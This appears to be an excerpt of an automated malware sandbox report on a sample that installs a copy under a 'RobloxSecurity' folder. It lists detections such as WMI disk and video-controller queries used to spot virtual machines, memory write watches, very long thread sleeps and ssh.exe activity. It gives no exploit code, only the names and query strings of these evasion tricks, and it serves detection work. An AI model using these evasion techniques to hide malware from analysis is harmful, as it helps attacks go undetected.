Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Memory allocated: 1F996210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Memory allocated: 1F9AFDF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1B8A9DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1B8C3950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 10DD58D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 10DEF3F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 17A71580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 17A73090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1EC01810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1EC199B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 167CFD40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 167E9760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1CF0AE90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1CF24830000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597665	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599655
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597970
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597077
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 582622
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
